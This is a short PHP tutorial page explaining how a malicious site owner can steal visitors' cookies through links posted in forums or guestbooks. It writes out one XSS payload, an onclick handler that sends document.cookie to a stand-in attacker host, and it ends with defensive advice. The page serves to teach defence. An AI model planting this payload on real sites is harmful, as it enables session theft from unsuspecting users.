Tools, FAQ, Tutorials:
Malicious Website Stealing Cookies in PHP
How Can Other Webmaster Steal Your Cookies in PHP?
✍: FYIcenter.com
All browsers are following the security rule that your cookies are sent back only to your Web servers. They will not be sent to other Webmaster's Web server directly. However, other Webmaster may design some malicious JavaScript codes to steal cookies created by your PHP pages. For example, if you allow visitors to post messages in your forum, comment area, or guestbooks with hyper links. A bad Webmaster who owns a Web site called www.badwebmaster.com could post a message like this on your Web site with a malicious hyper link:
<a href="/#" onclick="window.location='http://www.badwebmaster.com /stole.cgi?text='+escape(document.cookie); return false;"> Click here to get your free gift!</a>
If your visitor clicks this hyper link, all of your cookie values will be sent to this bad Webmaster's CGI program as part of the GET URL (not as cookies).
So check your forum, comment book or guestbook program. And do not allow visitors to post messages with client side scripts.
⇒ Understanding and Using Sessions in PHP
⇐ Cookies Encoded during Transportation in PHP
2016-10-29, ∼3254🔥, 0💬
Popular Posts:
How To Open Standard Output as a File Handle in PHP? If you want to open the standard output as a fi...
How to use the "forward-request" Policy Statement to call the backend service for an Azure API servi...
How To Change Text Fonts for Some Parts of a Paragraph? If you want to change text fonts or colors f...
How to install .NET Framework in Visual Studio Community 2017? I have the Visual Studio Installer in...
How to add an API to an API product for internal testing on the Publisher Portal of an Azure API Man...